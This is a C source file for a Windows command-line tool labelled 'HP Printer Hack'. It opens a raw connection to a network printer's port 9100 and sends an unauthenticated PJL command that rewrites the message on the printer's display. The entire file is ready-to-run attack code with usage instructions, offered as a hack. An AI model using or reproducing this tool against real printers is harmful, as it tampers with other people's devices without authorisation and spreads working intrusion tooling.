/*
 *	Windows port of HP Printer Hack by SteelBeak
 *	Original code by sili@l0pht.com
 *
 *	USAGE:
 *		hp [printer address] "[message]"
 *
 *  NOTE: If you have a multi-word message, you MUST
 *        contain the message in quotes otherwise the
 *        application will not pick it up.
 */

#include <stdio.h>
#include <winsock.h>

#define HPPORT	9100

void SendHPMsg(char *szServer, char *szMessage)
{
    LPHOSTENT lpHostEntry;
	lpHostEntry = gethostbyname(szServer);
    if (lpHostEntry == NULL)
    {
        fprintf(stderr,"\ngethostbyname(): %d\n", WSAGetLastError());
        return;
    }

	SOCKET	theSocket;
	theSocket = socket(AF_INET,				// Address family
					   SOCK_STREAM,			// Socket type
					   IPPROTO_TCP);		// Protocol
	if (theSocket == INVALID_SOCKET)
	{
		fprintf(stderr,"\nsocket(): %d\n", WSAGetLastError());
		return;
	}

	SOCKADDR_IN saServer;
	saServer.sin_family = AF_INET;
	saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
	saServer.sin_port = htons(HPPORT);

	int nRet;
	nRet = connect(theSocket,				// Socket
				   (LPSOCKADDR)&saServer,	// Server address
				   sizeof(struct sockaddr));// Length of server address structure
	if (nRet == SOCKET_ERROR)
	{
		fprintf(stderr,"\nconnect(): %d\n", WSAGetLastError());
		closesocket(theSocket);
		return;
	}

	char szBuf[100];
	strcpy(szBuf,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
	strncat(szBuf,szMessage,44);
	strcat(szBuf,"\"\r\n\033%-12345X\r\n");

	nRet = send(theSocket,				// Connected socket
				szBuf,					// Data buffer
				strlen(szBuf),			// Length of data
				0);						// Flags
	if (nRet == SOCKET_ERROR)
	{
		fprintf(stderr,"\nsend(): %d\n", WSAGetLastError());
		closesocket(theSocket);
		return;
	}

	closesocket(theSocket);
	return;
}

void main(int argc, char **argv)
{
	WORD wVersionRequested = MAKEWORD(1,1);
	WSADATA wsaData;
	int nRet;

	if (argc != 3)
	{
		fprintf(stderr,"\nSyntax: hp [machine] \"[message]\"\n");
		return;
	}

	nRet = WSAStartup(wVersionRequested, &wsaData);
	if (wsaData.wVersion != wVersionRequested)
	{	
		fprintf(stderr,"\nWrong Winsock Version\n");
		return;
	}

	SendHPMsg(argv[1], argv[2]);

	WSACleanup();
}